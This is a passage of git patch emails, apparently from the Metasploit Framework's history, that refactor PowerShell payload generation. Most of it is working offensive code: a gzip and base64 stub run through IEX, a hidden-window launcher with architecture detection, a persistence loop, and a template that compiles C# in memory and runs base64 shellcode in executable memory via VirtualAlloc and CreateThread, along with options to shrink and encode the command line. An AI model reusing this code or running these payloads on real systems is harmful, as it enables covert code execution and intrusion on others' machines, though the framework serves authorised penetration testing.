-		# Identify variables and replace them
-		#
-		def sub_vars
-			# Get list of variables, remove reserved
-			vars = get_var_names
-			# Create map, sub key for val
-			sub_map_generate(vars).each do |var,sub|
-				code.gsub!(var,sub)
-			end
-		end
+    #
+    # Identify variables and replace them
+    #
+    def sub_vars
+      # Get list of variables, remove reserved
+      vars = get_var_names
+      # Create map, sub key for val
+      sub_map_generate(vars).each do |var,sub|
+        code.gsub!(var,sub)
+      end
+    end
 
-		#
-		# Identify function names and replace them
-		#
-		def sub_funcs
-			# Find out function names, make map
-			# Sub map keys for values
-			sub_map_generate(get_func_names).each do |var,sub|
-				code.gsub!(var,sub)
-			end
-		end
+    #
+    # Identify function names and replace them
+    #
+    def sub_funcs
+      # Find out function names, make map
+      # Sub map keys for values
+      sub_map_generate(get_func_names).each do |var,sub|
+        code.gsub!(var,sub)
+      end
+    end
 
-		#
-		# Perform standard substitutions
-		#
-		def standard_subs(subs = %w{strip_comments strip_whitespace sub_funcs sub_vars} )
-			# Save us the trouble of breaking injected .NET and such
-			subs.delete('strip_whitespace') unless string_literals.empty?
-			# Run selected modifiers
-			subs.each do |modifier|
-				self.send(modifier)
-			end
-			code.gsub!(/^$|^\s+$/,'')
-			return code
-		end
+    #
+    # Perform standard substitutions
+    #
+    def standard_subs(subs = %w{strip_comments strip_whitespace sub_funcs sub_vars} )
+      # Save us the trouble of breaking injected .NET and such
+      subs.delete('strip_whitespace') unless string_literals.empty?
+      # Run selected modifiers
+      subs.each do |modifier|
+        self.send(modifier)
+      end
+      code.gsub!(/^$|^\s+$/,'')
+      return code
+    end
 
-	end # Obfu
+  end # Obfu
 
-	class Param
-		attr_accessor :klass, :name
-		def initialize(klass,name)
-			@klass = klass.strip.gsub(/\[|\]|\s/,'')
-			@name = name.strip.gsub(/\s|,/,'')
-		end
+  class Param
+    attr_accessor :klass, :name
+    def initialize(klass,name)
+      @klass = klass.strip.gsub(/\[|\]|\s/,'')
+      @name = name.strip.gsub(/\s|,/,'')
+    end
 
-		def to_s
-			"[#{klass}]$#{name}"
-		end
-	end
+    def to_s
+      "[#{klass}]$#{name}"
+    end
+  end
 
-	class Function
-		attr_accessor :code, :name, :params
+  class Function
+    attr_accessor :code, :name, :params
 
-		include Output
-		include Parser
-		include Obfu
+    include Output
+    include Parser
+    include Obfu
 
-		def initialize(name,code)
-			@name = name
-			@code = code
-			populate_params
-		end
-		def to_s
-			"function #{name} #{code}"
-		end
+    def initialize(name,code)
+      @name = name
+      @code = code
+      populate_params
+    end
+    def to_s
+      "function #{name} #{code}"
+    end
 
-		def populate_params
-			@params = []
-			start = code.index(/param\s+\(|param\(/im)
-			return unless start
-			# Get start of our block
-			idx = scan_with_index('(',code[start..-1]).first.last + start
-			pclause = block_extract(idx)
-			# Keep lines which declare a variable of some class
-			vars = pclause.split(/\n|;/).select {|e| e =~ /\]\$\w/}
-			vars.map! {|v| v.split('=',2).first}.map(&:strip)
-			# Ignore assignment, create params with class and variable names
-			vars.map {|e| e.split('$')}.each do |klass,name|
-				@params << Param.new(klass,name)
-			end
-		end
-	end
+    def populate_params
+      @params = []
+      start = code.index(/param\s+\(|param\(/im)
+      return unless start
+      # Get start of our block
+      idx = scan_with_index('(',code[start..-1]).first.last + start
+      pclause = block_extract(idx)
+      # Keep lines which declare a variable of some class
+      vars = pclause.split(/\n|;/).select {|e| e =~ /\]\$\w/}
+      vars.map! {|v| v.split('=',2).first}.map(&:strip)
+      # Ignore assignment, create params with class and variable names
+      vars.map {|e| e.split('$')}.each do |klass,name|
+        @params << Param.new(klass,name)
+      end
+    end
+  end
 
-	class Script
-		attr_accessor :code
-		attr_reader :functions
+  class Script
+    attr_accessor :code
+    attr_reader :functions
 
-		include Output
-		include Parser
-		include Obfu
-		# Pretend we are actually a string
-		extend Forwardable
-		# In case someone messes with String we delegate based on its instance methods
-		eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
+    include Output
+    include Parser
+    include Obfu
+    # Pretend we are actually a string
+    extend Forwardable
+    # In case someone messes with String we delegate based on its instance methods
+    eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
 
-		# def method_missing(meth, *args, &block)
-		#   code.send(meth,*args,&block) || (raise NoMethodError.new, meth)
-		# end
+    # def method_missing(meth, *args, &block)
+    #   code.send(meth,*args,&block) || (raise NoMethodError.new, meth)
+    # end
 
-		def initialize(code)
-			@code = ''
-			begin
-				# Open code file for reading
-				fd = ::File.new(code, 'rb')
-				while (line = fd.gets)
-					@code << line
-				end
+    def initialize(code)
+      @code = ''
+      begin
+        # Open code file for reading
+        fd = ::File.new(code, 'rb')
+        while (line = fd.gets)
+          @code << line
+        end
 
-				# Close open file
-				fd.close
-			rescue Errno::ENAMETOOLONG, Errno::ENOENT
-				# Treat code as a... code
-				@code = code.to_s.dup # in case we're eating another script
-			end
-			@functions = get_func_names.map {|f| get_func(f)}
-		end
+        # Close open file
+        fd.close
+      rescue Errno::ENAMETOOLONG, Errno::ENOENT
+        # Treat code as a... code
+        @code = code.to_s.dup # in case we're eating another script
+      end
+      @functions = get_func_names.map {|f| get_func(f)}
+    end
 
 
-		##
-		# Class methods
-		##
+    ##
+    # Class methods
+    ##
 
     #
     # Convert binary to byte array, read from file if able
@@ -406,27 +408,27 @@ module Powershell
       return psh << lines.join("") + "\r\n"
     end
 
-		#
-		# Build a byte array to load into powershell code
-		#
-		def self.build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
-			code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
-			return to_byte_array(input_data,var_name)
-		end
+    #
+    # Build a byte array to load into powershell code
+    #
+    def self.build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+      code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+      return to_byte_array(input_data,var_name)
+    end
 
-		def self.psp_funcs(dir)
-			scripts = Dir.glob(File.expand_path(dir) + '/**/*').select {|e| e =~ /ps1$|psm1$/}
-			functions = scripts.map {|s| puts s; Script.new(s).functions}
-			return functions.flatten
-		end
+    def self.psp_funcs(dir)
+      scripts = Dir.glob(File.expand_path(dir) + '/**/*').select {|e| e =~ /ps1$|psm1$/}
+      functions = scripts.map {|s| puts s; Script.new(s).functions}
+      return functions.flatten
+    end
 
-		#
-		# Return list of code modifier methods
-		#
-		def self.code_modifiers
-			self.instance_methods.select {|m| m =~ /^(strip|sub)/}
-		end
-	end # class Script
+    #
+    # Return list of code modifier methods
+    #
+    def self.code_modifiers
+      self.instance_methods.select {|m| m =~ /^(strip|sub)/}
+    end
+  end # class Script
 
 end
 end

From b10df54dbbe4be7816641d4aa7bfbd53ff55a061 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 8 Feb 2014 21:34:51 +0000
Subject: [PATCH 038/321] Dont need to encode the compress payload

---
 lib/msf/core/exploit/powershell.rb | 13 ++++++++++---
 lib/rex/exploitation/powershell.rb | 15 ++++-----------
 2 files changed, 14 insertions(+), 14 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index a92aff6805..b1c3b183b4 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -159,13 +159,18 @@ module Exploit::Powershell
   # Runs powershell in hidden window raising interactive proc msg
   # Detect the architecture
   #
-  def run_hidden_psh(ps_code,payload_arch)
+  def run_hidden_psh(ps_code, payload_arch, encoded)
     arg_opts = {
         :noprofile => true,
         :windowstyle => 'hidden',
-        :encodedcommand => ps_code
     }
 
+    if encoded
+      arg_opts[:encodedcommand] = ps_code
+    else
+      arg_opts[:command] = ps_code.gsub("'","''")
+    end
+
     # Old technique fails if powershell exits..
     arg_opts[:noexit] = true if datastore['PSH::old_technique']
 
@@ -236,12 +241,14 @@ EOS
 
     if (encoded.length <= compressed.length)
       smallest_payload = encoded
+      enc = true
     else
       smallest_payload = compressed
+      enc = false
     end
 
     # Wrap in hidden runtime / architecture detection
-    final_payload = run_hidden_psh(smallest_payload, payload_arch)
+    final_payload = run_hidden_psh(smallest_payload, payload_arch, enc)
 
     if opts[:use_single_quotes]
       # Escape Single Quotes
diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index f872a2d700..4e352e0d69 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -54,12 +54,12 @@ module Powershell
 
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
-      psh_expression =  "$stream = New-Object IO.MemoryStream(,"
+      psh_expression =  "$s=New-Object IO.MemoryStream(,"
       psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
       # Uncompress and invoke the expression (execute)
       psh_expression << "$(IEX $(New-Object IO.StreamReader("
       psh_expression << "$(New-Object IO.Compression.GzipStream("
-      psh_expression << "$stream,"
+      psh_expression << "$s,"
       psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
       psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
 
@@ -67,22 +67,15 @@ module Powershell
       #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
       psh_expression << "echo '#{eof}';" if eof
 
-      # Convert expression to unicode
-      unicode_expression = Rex::Text.to_unicode(psh_expression)
+      @code = psh_expression
 
-      # Base64 encode the unicode expression
-      @code = Rex::Text.encode_base64(unicode_expression)
-
-      return code
+      return psh_expression
     end
 
     #
     # Reverse the compression process
     #
     def decompress_code
-      # Decode base64 and convert to ascii
-      raw = Rex::Text.decode_base64(code)
-      ascii_expression = Rex::Text.to_ascii(raw)
       # Extract substring with payload
       encoded_stream = ascii_expression.scan(/FromBase64String\('(.*)'/).flatten.first
       # Decode and decompress the string

From c76862b391b9a2ab06dc938d3455a619d5acb2c3 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 8 Feb 2014 22:10:33 +0000
Subject: [PATCH 039/321] Reduce payload size

---
 lib/msf/core/exploit/powershell.rb | 40 ++++++++++++------------------
 lib/rex/exploitation/powershell.rb | 11 +++-----
 2 files changed, 20 insertions(+), 31 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index b1c3b183b4..206bb523fb 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -183,33 +183,25 @@ module Exploit::Powershell
     end
 
     process_start_info = <<EOS
-$si=New-Object System.Diagnostics.ProcessStartInfo
-$si.FileName=$ps_bin
-$si.Arguments='#{ps_args}'
-$si.UseShellExecute=$false
-$si.RedirectStandardOutput=$true
-$si.WindowStyle='Hidden'
-$si.CreateNoWindow=$true
-$p=[System.Diagnostics.Process]::Start($si)
+$s=New-Object System.Diagnostics.ProcessStartInfo
+$s.FileName=$b
+$s.Arguments='#{ps_args}'
+$s.UseShellExecute=$false
+$s.RedirectStandardOutput=$true
+$s.WindowStyle='Hidden'
+$s.CreateNoWindow=$true
+$p=[System.Diagnostics.Process]::Start($s)
 EOS
     process_start_info.gsub!("\n",';')
 
-
     archictecure_detection = <<EOS
-$x86=#{arch_x86};
-if ([IntPtr]::Size -eq 4) {
-  if ($x86) {
-    $ps_bin='powershell.exe'
-  } else {
-    $ps_bin=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'
-  }
-} else {
-  if ($x86) {
-    $ps_bin=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
-  } else {
-    $ps_bin='powershell.exe'
-  }
-};
+$a=#{arch_x86};
+if([IntPtr]::Size -eq 4){
+if($a){$b='powershell.exe'}
+else{$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'}
+}else{
+if($a){$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
+}else{$b='powershell.exe'}};
 EOS
     archictecure_detection.gsub!("\n","")
     archictecure_detection.gsub!("\s\s","")
@@ -269,7 +261,7 @@ EOS
       command = "%COMSPEC% /b /c #{psh_command}"
     end
 
-    vprint_status("Command length: #{command.length}")
+    vprint_status("Powershell command length: #{command.length}")
     return command
   end
 
diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index 4e352e0d69..28424cbc46 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -54,14 +54,11 @@ module Powershell
 
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
-      psh_expression =  "$s=New-Object IO.MemoryStream(,"
-      psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
-      # Uncompress and invoke the expression (execute)
-      psh_expression << "$(IEX $(New-Object IO.StreamReader("
-      psh_expression << "$(New-Object IO.Compression.GzipStream("
-      psh_expression << "$s,"
+      psh_expression =  "IEX(New-Object IO.StreamReader("
+      psh_expression << "(New-Object IO.Compression.GzipStream("
+      psh_expression << "(New-Object IO.MemoryStream(,[Convert]::FromBase64String('#{encoded_stream}'))),"
       psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
-      psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
+      psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd();"
 
       # If eof is set, add a marker to signify end of code output
       #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end

From ad308efc05ad077fdd7320e9560acd1782ac0551 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 8 Feb 2014 22:53:47 +0000
Subject: [PATCH 040/321] Really minimize commandline size

---
 .../scripts/to_mem_dotnet.ps1.template        | 48 ++++++++-----------
 lib/msf/core/exploit/powershell.rb            |  5 +-
 lib/msf/util/exe.rb                           | 20 ++++----
 3 files changed, 32 insertions(+), 41 deletions(-)

diff --git a/data/templates/scripts/to_mem_dotnet.ps1.template b/data/templates/scripts/to_mem_dotnet.ps1.template
index 3641ac94ef..236de4564e 100644
--- a/data/templates/scripts/to_mem_dotnet.ps1.template
+++ b/data/templates/scripts/to_mem_dotnet.ps1.template
@@ -1,30 +1,24 @@
 Set-StrictMode -Version 2
 $%{var_syscode} = @"
-	using System;
-	using System.Runtime.InteropServices;
-	namespace %{var_kernel32} {
-		public class func {
-			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
-			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
-			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
-			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
-			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
-			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
-		}
-	}
+using System;
+using System.Runtime.InteropServices;
+namespace %{var_kernel32} {
+public class func {
+[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr a,uint b,uint c,uint d);
+[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr e,uint f,IntPtr g,IntPtr h,uint i,IntPtr j);
+[DllImport("kernel32.dll")]public static extern int WaitForSingleObject(IntPtr k,int l);
+}
+}
 "@
-
-$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
-$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
-$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
-$%{var_compileParams}.GenerateInMemory = $True
-$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
-
-[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
-
-$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
-if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
-[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
-[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
-if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
-$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
+$%{var_codeProvider}=New-Object Microsoft.CSharp.CSharpCodeProvider
+$%{var_compileParams}=New-Object System.CodeDom.Compiler.CompilerParameters
+$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location))
+$%{var_compileParams}.GenerateInMemory=$True
+$%{var_output}=$%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams},$%{var_syscode})
+[Byte[]]$%{var_code}=[System.Convert]::FromBase64String("%{b64shellcode}")
+$%{var_baseaddr}=[%{var_kernel32}.func]::VirtualAlloc(0,$%{var_code}.Length+1,0x3000,0x40)
+if([Bool]!$%{var_baseaddr}){$global:result=3;return}
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code},0,$%{var_baseaddr},$%{var_code}.Length)
+[IntPtr] $%{var_threadHandle}=[%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+if([Bool]!$%{var_threadHandle}){$global:result=7;return}
+[%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle},0xFFFFFFFF)
diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 206bb523fb..36a021ae88 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -187,9 +187,6 @@ $s=New-Object System.Diagnostics.ProcessStartInfo
 $s.FileName=$b
 $s.Arguments='#{ps_args}'
 $s.UseShellExecute=$false
-$s.RedirectStandardOutput=$true
-$s.WindowStyle='Hidden'
-$s.CreateNoWindow=$true
 $p=[System.Diagnostics.Process]::Start($s)
 EOS
     process_start_info.gsub!("\n",';')
@@ -204,7 +201,6 @@ if($a){$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
 }else{$b='powershell.exe'}};
 EOS
     archictecure_detection.gsub!("\n","")
-    archictecure_detection.gsub!("\s\s","")
 
     return (archictecure_detection + process_start_info)
   end
@@ -219,6 +215,7 @@ EOS
     else
       psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
     end
+
     # Run our payload in a while loop
     if datastore['PSH::persist']
       fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index a5d4fc147f..f56945c408 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -889,17 +889,17 @@ def self.to_vba(framework,code,opts={})
   end
 
   def self.to_win32pe_psh_net(framework, code, opts={})
-    hash_sub = {}
-    hash_sub[:var_code] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_kernel32] 	= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_baseaddr] 	= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_threadHandle] 	= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_output] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_temp] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_codeProvider] 	= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_compileParams] 	= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    rig = Rex::RandomIdentifierGenerator.new()
+    rig.init_var(:var_code)
+    rig.init_var(:var_kernel32)
+    rig.init_var(:var_baseaddr)
+    rig.init_var(:var_threadHandle)
+    rig.init_var(:var_output)
+    rig.init_var(:var_codeProvider)
+    rig.init_var(:var_compileParams)
+    rig.init_var(:var_syscode)
 
+    hash_sub = rig.to_h
     hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
 
     return read_replace_script_template("to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")

From f398c982e38b678bace76668f2f273d652a656ce Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 8 Feb 2014 23:51:13 +0000
Subject: [PATCH 041/321] Include option to ensure payload is fully encoded

---
 lib/msf/core/exploit/powershell.rb | 43 +++++++++++++++++-------------
 1 file changed, 25 insertions(+), 18 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 36a021ae88..004edeb708 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -225,32 +225,39 @@ EOS
       psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
     end
 
-    compressed = compress_script(psh_payload)
-    encoded = encode_script(psh_payload)
+    compressed_payload = compress_script(psh_payload)
+    encoded_payload = encode_script(psh_payload)
 
-    if (encoded.length <= compressed.length)
-      smallest_payload = encoded
-      enc = true
+    if (encoded_payload.length <= compressed_payload.length)
+      smallest_payload = encoded_payload
+      encoded = true
     else
-      smallest_payload = compressed
-      enc = false
+      smallest_payload = compressed_payload
+      encoded = false
     end
 
     # Wrap in hidden runtime / architecture detection
-    final_payload = run_hidden_psh(smallest_payload, payload_arch, enc)
+    final_payload = run_hidden_psh(smallest_payload, payload_arch, encoded)
 
-    if opts[:use_single_quotes]
-      # Escape Single Quotes
-      final_payload.gsub!("'","''")
-      # Wrap in quotes
-      final_payload = "'#{final_payload}'"
+    command_args = {
+      :noprofile => true,
+      :windowstyle => 'hidden'
+    }
+
+    if opts[:encode_final_payload]
+      command_args[:encodedcommand] = encode_script(final_payload)
+    else
+      if opts[:use_single_quotes]
+        # Escape Single Quotes
+        final_payload.gsub!("'","''")
+        # Wrap in quotes
+        final_payload = "'#{final_payload}'"
+      end
+
+      command_args[:command] = final_payload
     end
 
-    psh_command = generate_psh_command_line({
-                      :noprofile => true,
-                      :windowstyle => 'hidden',
-                      :command => final_payload
-    })
+    psh_command = generate_psh_command_line(command_args)
 
     if opts[:remove_comspec]
       command = psh_command

From 02f1ff27eef399f35d73e639e9c7d4728d69ddda Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 00:55:26 +0000
Subject: [PATCH 042/321] Add option to encode inner payload

---
 lib/msf/core/exploit/powershell.rb | 18 +++++++++++++++---
 1 file changed, 15 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 004edeb708..0930a7a790 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -228,12 +228,24 @@ EOS
     compressed_payload = compress_script(psh_payload)
     encoded_payload = encode_script(psh_payload)
 
-    if (encoded_payload.length <= compressed_payload.length)
+    if encoded_payload.length <= compressed_payload.length
       smallest_payload = encoded_payload
       encoded = true
     else
-      smallest_payload = compressed_payload
-      encoded = false
+      # Don't use this with :encode_final_payload or it will be massive
+      if opts[:encode_inner_payload] && !opts[:encode_final_payload]
+        encoded = true
+        compressed_encoded_payload = encode_script(compressed_payload)
+
+        if encoded_payload.length <= compressed_encoded_payload.length
+          smallest_payload = encoded_payload
+        else
+          smallest_payload = compressed_encoded_payload
+        end
+      else
+        smallest_payload = compressed_payload
+        encoded = false
+      end
     end
 
     # Wrap in hidden runtime / architecture detection

From f1959f5313784b27587c70d5e72ea1a3dedad04d Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 11:18:15 +0000
Subject: [PATCH 043/321] Fixup WMI

---
 modules/exploits/windows/local/wmi.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb
index e57b010dbf..1ed8741ec9 100644
--- a/modules/exploits/windows/local/wmi.rb
+++ b/modules/exploits/windows/local/wmi.rb
@@ -82,6 +82,7 @@ class Metasploit3 < Msf::Exploit::Local
                             payload_instance.arch.first,
                             {
                                 :remove_comspec => true,
+                                :encode_inner_payload => true,
                                 :use_single_quotes => true
                             })
       chunks = split_code(psh, 1000)

From 1f9b452425840018d9f23488b833e8a3d793c844 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 11:23:39 +0000
Subject: [PATCH 044/321] Dont tidy up template yet

---
 .../scripts/to_mem_dotnet.ps1.template        | 48 +++++++++++--------
 lib/msf/util/exe.rb                           |  3 +-
 2 files changed, 29 insertions(+), 22 deletions(-)

diff --git a/data/templates/scripts/to_mem_dotnet.ps1.template b/data/templates/scripts/to_mem_dotnet.ps1.template
index 236de4564e..3641ac94ef 100644
--- a/data/templates/scripts/to_mem_dotnet.ps1.template
+++ b/data/templates/scripts/to_mem_dotnet.ps1.template
@@ -1,24 +1,30 @@
 Set-StrictMode -Version 2
 $%{var_syscode} = @"
-using System;
-using System.Runtime.InteropServices;
-namespace %{var_kernel32} {
-public class func {
-[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr a,uint b,uint c,uint d);
-[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr e,uint f,IntPtr g,IntPtr h,uint i,IntPtr j);
-[DllImport("kernel32.dll")]public static extern int WaitForSingleObject(IntPtr k,int l);
-}
-}
+	using System;
+	using System.Runtime.InteropServices;
+	namespace %{var_kernel32} {
+		public class func {
+			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+		}
+	}
 "@
-$%{var_codeProvider}=New-Object Microsoft.CSharp.CSharpCodeProvider
-$%{var_compileParams}=New-Object System.CodeDom.Compiler.CompilerParameters
-$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location))
-$%{var_compileParams}.GenerateInMemory=$True
-$%{var_output}=$%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams},$%{var_syscode})
-[Byte[]]$%{var_code}=[System.Convert]::FromBase64String("%{b64shellcode}")
-$%{var_baseaddr}=[%{var_kernel32}.func]::VirtualAlloc(0,$%{var_code}.Length+1,0x3000,0x40)
-if([Bool]!$%{var_baseaddr}){$global:result=3;return}
-[System.Runtime.InteropServices.Marshal]::Copy($%{var_code},0,$%{var_baseaddr},$%{var_code}.Length)
-[IntPtr] $%{var_threadHandle}=[%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
-if([Bool]!$%{var_threadHandle}){$global:result=7;return}
-[%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle},0xFFFFFFFF)
+
+$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
+$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
+$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
+$%{var_compileParams}.GenerateInMemory = $True
+$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
+[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index f56945c408..cdf83fb26a 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -884,7 +884,7 @@ def self.to_vba(framework,code,opts={})
 
     hash_sub = rig.to_h
     hash_sub[:shellcode] = Rex::Text.to_csharp(code, 100, rig[:var_bytearray])
-  
+
     return read_replace_script_template("to_mem.aspx.template", hash_sub)
   end
 
@@ -898,6 +898,7 @@ def self.to_vba(framework,code,opts={})
     rig.init_var(:var_codeProvider)
     rig.init_var(:var_compileParams)
     rig.init_var(:var_syscode)
+    rig.init_var(:var_temp)
 
